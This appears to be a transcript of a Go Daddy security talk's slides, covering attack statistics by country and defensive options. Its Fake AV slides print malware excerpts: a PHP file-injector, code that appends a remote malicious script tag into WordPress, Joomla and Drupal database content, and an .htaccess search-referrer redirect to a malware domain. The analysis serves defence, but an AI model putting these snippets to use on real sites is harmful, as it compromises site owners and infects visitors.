Keeping up with the web application security
description
Transcript of Keeping up with the web application security
![Page 1: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/1.jpg)
KEEPING UP WITH THE WEB APPLICATION SECURITY
Ganesh Devarajan & Todd Redfoot
![Page 2: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/2.jpg)
Introduction
Todd Redfoot Chief Information Security Officer
Ganesh Devarajan Sr. Security Architect
![Page 3: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/3.jpg)
The Background
(What does Go Daddy do?)
![Page 4: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/4.jpg)
![Page 5: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/5.jpg)
What does Go Daddy do?
9.4 Million Customers 48 Million Domains Under Management Over 5 million Active Hosting Accounts 1/3 of all DNS queries run through our
servers We register, renew or transfer more
than one domain name every second
![Page 6: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/6.jpg)
What does Go Daddy do?
40+ Security Professionals in Team 24 x 7 Operations Center Research Engineering Forensics Customer Security Advisors Penetration Testing User Administration Development
![Page 7: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/7.jpg)
![Page 8: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/8.jpg)
The Numbers
(What does Go Daddy see?)
![Page 9: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/9.jpg)
What do we see?
Monitor over 100,000 events per second 8.6 Billion/Day
DDoS - ~900 Attacks per day / 6K per week Feb 2011 - Largest attack @ 21M pps Last Week – 40G Attack
Brute Force – 3.5M per hour
![Page 10: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/10.jpg)
What do we see?
“Other” Attacks : 425K – Invalid Directory Traversal 90K – XSS Prevention 115K – SQL Injection Prevention
… all in a 24 hour period…
![Page 11: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/11.jpg)
Current Trends
![Page 12: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/12.jpg)
SSH Brute Forcers
US54%
CN20%
KR6%
BG4%
AR4% TW
3%FR2%
JP2%
CA2%
BR2%
![Page 13: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/13.jpg)
SSH Brute Forcers
Englewood, Colorado140 Million attempts
![Page 14: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/14.jpg)
MS-SQL Brute Forcers
US65%
CN24%
TR5%
CA2%
-1%
KR1%
TH1%
RU0%
VN0%
IE0%
![Page 15: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/15.jpg)
MS-SQL Brute Forcers
Orlando, FL348 Million attempts
![Page 16: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/16.jpg)
My-SQL Brute Forcers
US78%
CN12%
CA4%
SE2%
FR2%
MY1%
PH1%
IN0%
JP0%
KR0%
![Page 17: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/17.jpg)
My-SQL Brute Forcers
![Page 18: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/18.jpg)
FTP Brute Forcers
CN66%
US26%
HK2%
CA2%IE
2%TW1%
KR1%
RS0%
DE0%
BR0%
![Page 19: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/19.jpg)
FTP Brute Forcers
XingPing, CN12 Million attempts
![Page 20: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/20.jpg)
Brute Forcers - All
US61%
CN27%
TR4%KR
2%CA2%-
1%BG1%
TH1%
AR1%
TW1%
![Page 21: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/21.jpg)
Brute Forcers - US
Garden City, NY75.7 Million attempts
![Page 22: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/22.jpg)
Brute Forcers - CN
Datong, CN22.5 Million attempts
![Page 23: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/23.jpg)
Brute Forcinator
![Page 24: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/24.jpg)
SQL Injection
US41%
CN28%
BG9%
UK5%
ID4%NL
4%CZ3%JP
3%AU2%
FR2%
![Page 25: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/25.jpg)
SQL Injection
Seattle, WA1.3 Million attempts
![Page 26: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/26.jpg)
Backdoor Shells
US87%
ID4%
NG2%UK
2%CN1%
CA1%
DE1%
BR1%
NL1%
AL0%
![Page 27: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/27.jpg)
Backdoor Shells
Phone Company (91%)Mountain View, CA
![Page 28: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/28.jpg)
PHP AttacksUS
65%
KR8%
FR6%
RU4%DE
3%LU3%UK
3%BR3%
CA2%
NL2%
![Page 29: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/29.jpg)
PHP Attacks
Berlin, Germany1.9 Million attempts
![Page 30: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/30.jpg)
PHP Attacks
Montreal, CA1.1 Million attempts
![Page 31: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/31.jpg)
Botnet
US52%
UK7%
KR6%
PL6%
FR6%
DE6%
CA6%
RU5%
NL4%
AU3%
![Page 32: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/32.jpg)
Botnet
![Page 33: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/33.jpg)
Botnet
Source - https://zeustracker.abuse.ch/
![Page 34: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/34.jpg)
Botnet
Source - http://www.shadowserver.org/wiki/pmwiki.php/Stats/DroneMaps
![Page 35: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/35.jpg)
Phishing
![Page 36: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/36.jpg)
The Good, Bad and Ugly?
![Page 37: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/37.jpg)
The Bad – Most Events
![Page 38: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/38.jpg)
The Ugly – Security Events & DDoS
![Page 39: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/39.jpg)
New Trends
![Page 40: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/40.jpg)
Recent Changes
“Hacktivists” Lulzsec = Twitter ComodoHacker = Pastebin
Phishing -> Spear Phishing Targeted & Coordinated Attacks
RSA / Lockheed Martin Connection
![Page 41: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/41.jpg)
What’s in the News?
![Page 42: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/42.jpg)
More Client-side Exploits Browser exploits Adobe exploits
Web Server Compromises Brute Force Attacks Leveraging Web Application Vulnerabilities Config files with passwords
More of the same…
![Page 43: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/43.jpg)
Scareware Reports fake viruses to users Asks for fee to remove the threat
Paying does nothing but give them your CC# $10 Million in Revenue last year
Fake AV
![Page 44: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/44.jpg)
Fake AV Analysis
![Page 45: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/45.jpg)
$$$$$$
<html>Holy Crap! Infected! Click Here to clean</html>
GET http://intermediary.com/ll.php
Make HTTP calls to infection script and site is infected
Compromised Attack Server(s)
Servers with Compromised Accounts(Zeus/Phishing/etc)
FTP/SSH Upload of Attack Shell/Script
Casual Web User Visits Infected Site
End Users
Fake AV Basterds
<script>http://intermediary.com/ll.php</script>
Disposable Domain Name
Registrant:Hilary Kneber [email protected] fax: 756946829/2 Sun street. Montey 29Virginia NA 3947
Fake AV – Attack Breakdown
![Page 46: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/46.jpg)
$z=$_SERVER["DOCUMENT_ROOT"];$encoded='<'.'?php /**/ [base64 encoded string]"));?'.'>';@unlink($_SERVER['SCRIPT_FILENAME']);$val=$z;$totalinjected=0;echo "Working with $val\n!!STARTING!!";ob_flush();$start_time=microtime(true);if ($val!="")do_folder($val);$end_time=microtime(true)-$start_time;echo "|Injected| $totalinjected files in $end_time seconds\n";
Fake AV – Sample Shell
![Page 47: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/47.jpg)
…
$insert='<script src="http://welcometotheglobalisorg.com/js.php?kk=26"></script>';
...
$link=mysql_connect($host,$user,$pass);
if (!$link) {
die('Could not connect: ' . mysql_error());
}else{
echo 'Connected successfully'."\n";
$db_list = mysql_list_dbs($link);
$bases = array();
while ($row = mysql_fetch_object($db_list)) {
$bases[]=$row->Database;
}
…
//wordpress
if (last_is($table,"_posts")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `post_content` = concat(`post_content`,'$insert')"; }
//joomla
if (last_is($table,"_content")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `introtext` = concat(`introtext`,'$insert')“; }
//drupal
if (last_is($table,"node_revisions")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `body` = concat(`body`,'$insert'), format=2“; }
if (last_is($table,"_post")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `title` = concat(`title`,'$insert')“; }
Fake AV – DB Variant
![Page 48: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/48.jpg)
Fake AV - Search Redirect<IfModule mod_rewrite.c>RewriteEngine OnRewriteOptions inheritRewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=945 [R,L]</IfModule>
addhandler x-httpd-php-cgi .php4addhandler x-httpd-php5-cgi .php5addhandler x-httpd-php5-cgi .php
![Page 49: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/49.jpg)
Custom Monitoring
![Page 50: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/50.jpg)
UDP Flooder
![Page 51: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/51.jpg)
How to Protect?
![Page 52: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/52.jpg)
Website Vulnerability Scanners Website Protection -Site Scanner
($48/Year) Beyond Security($99.95/Year) McAfee SecureTM (~$2100/Year) WhiteHat Security® IBM AppScan® Cenzic® HP WebInspect®
![Page 53: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/53.jpg)
Web Based Malware Detection Virtual machine Honey pots
Monitor Creation of new Processes, File system or Registry entries, etc.
Browser Emulation Reputation Service
Internet’s black list Signature Based Detection/Prevention
Intrusion Detection System/Intrusion Prevention System
Anti-Virus
![Page 54: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/54.jpg)
New Methodologies
![Page 55: Keeping up with the web application security](https://reader035.fdocuments.net/reader035/viewer/2022062813/568165aa550346895dd891ca/html5/thumbnails/55.jpg)
Questions?